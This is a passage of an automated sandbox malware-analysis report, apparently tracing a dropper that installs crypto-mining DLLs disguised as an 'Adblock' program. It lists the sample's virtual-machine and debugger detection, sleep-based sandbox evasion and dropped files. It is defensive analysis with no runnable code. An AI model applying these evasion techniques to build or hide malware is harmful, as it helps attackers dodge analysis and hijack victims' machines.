                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 5
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_13-102458
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif TID: 424Thread sleep count: 419 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif TID: 424Thread sleep time: -419000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp TID: 2720Thread sleep time: -90000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp TID: 1124Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr TID: 4880Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3900Thread sleep count: 118 > 30
                Source: C:\Windows\System32\svchost.exe TID: 1248Thread sleep count: 2157 > 30
                Source: C:\Windows\System32\svchost.exe TID: 1248Thread sleep time: -107850s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifWindow / User API: threadDelayed 419Jump to behavior
                Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 2157
                Source: C:\Windows\System32\svchost.exeWindow / User API: foregroundWindowGot 1570
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2455
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifAPI coverage: 5.1 %
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\WinSparkle.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\Adblock.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-8D8UE.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\MiningGpu.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\SysGpuInfoEx.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\nvrtc64_100_0.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-UM4C0.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-1R9C0.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-OFSVL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-ESNDI.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\xmrBridge.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-Q0IO6.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-6I5O7.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-OAES3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\DnsService.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\XbCZmnlWlcNasYtQIR\xfQBIgJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\MassiveService.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\nvml.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-NIJ7O.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-CRQM5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\XMRCLBridgeNV.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-AS67L.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-BD3CU.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\nvrtc-builtins64_100.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\setup[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\is-B71RB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\XMRCLBridge.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpDropped PE file which has not been started: C:\Users\user\Programs\Adblock\kawBridge.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile opened: PhysicalDrive0Jump to behavior
                Source: Fuck.exe.pif, 00000014.00000002.47265188405.0000000002740000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMware
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QnkxHhGejwsevkFWZWzN=qBqEMUwrWK
                Source: Fuck.exe.pif, 00000014.00000002.47265188405.0000000002740000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Chrome/HEADIsWow64Processkernel32X:\Windows\SysWOW64\ntdll.dllntdll.dllRtlInitUnicodeStringZwOpenFileZwCreateSectionZwMapViewOfSectionNtUnmapViewOfSectionNtQueryInformationProcess{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}RtlRandomExntdll:y--\Driver\Device ParametersEDID(IsActive)(NotActive)BAD EDID!No EDID!--Nm:SYSTEM\ControlSet001\Enum\DISPLAY\\.\PhysicalDrive%d---VMwareVirtualBoxVBoxQEMUDisplay AdapterNon-PnPVMwareVirtualBoxVBoxQEMUWestern Disk HARDDISK(1):(2):text/*Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413
                Source: Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47256501864.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43347888964.0000000000ACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fast.vmwareinc.demdex.net
                Source: Fuck.exe.pif, 0000000D.00000003.42696680342.0000000004545000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000002.42705124329.0000000004547000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42635913525.0000000004542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00405423 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,1_2_00405423
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00402395 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00402395
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECE27D lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00ECE27D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECD72C FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00ECD72C
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECDA5F FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00ECDA5F
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EDA37B FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00EDA37B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED64E7 FindFirstFileW,FindNextFileW,FindClose,13_2_00ED64E7
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E9C522 FindFirstFileExW,13_2_00E9C522
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED71DF FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00ED71DF
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED713E FindFirstFileW,FindClose,13_2_00ED713E
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED9E92 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00ED9E92
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED9FED SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00ED9FED
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ECE27D lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00ECE27D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EDA37B FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00EDA37B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED64E7 FindFirstFileW,FindNextFileW,FindClose,19_2_00ED64E7
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E9C522 FindFirstFileExW,19_2_00E9C522
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED71DF FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00ED71DF
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED713E FindFirstFileW,FindClose,19_2_00ED713E
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ECD72C FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00ECD72C
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ECDA5F FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00ECDA5F
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED9E92 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00ED9E92
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED9FED SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00ED9FED
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00402F10 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00402F10
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E84F68 mov eax, dword ptr fs:[00000030h]13_2_00E84F68
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E84F68 mov eax, dword ptr fs:[00000030h]19_2_00E84F68
                Source: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E928A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00E928A2
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EC11EC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00EC11EC
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EDF2FB BlockInput,13_2_00EDF2FB
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00406EE0 SetUnhandledExceptionFilter,1_2_00406EE0
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00406C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00406C90
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E928A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00E928A2
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E80ABF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00E80ABF
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E80C55 SetUnhandledExceptionFilter,13_2_00E80C55
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E80EA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00E80EA1
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E928A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00E928A2
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E80ABF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00E80ABF
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E80C55 SetUnhandledExceptionFilter,19_2_00E80C55
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E80EA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00E80EA1

                HIPS / PFW / Operating System Protection Evasion

                barindex
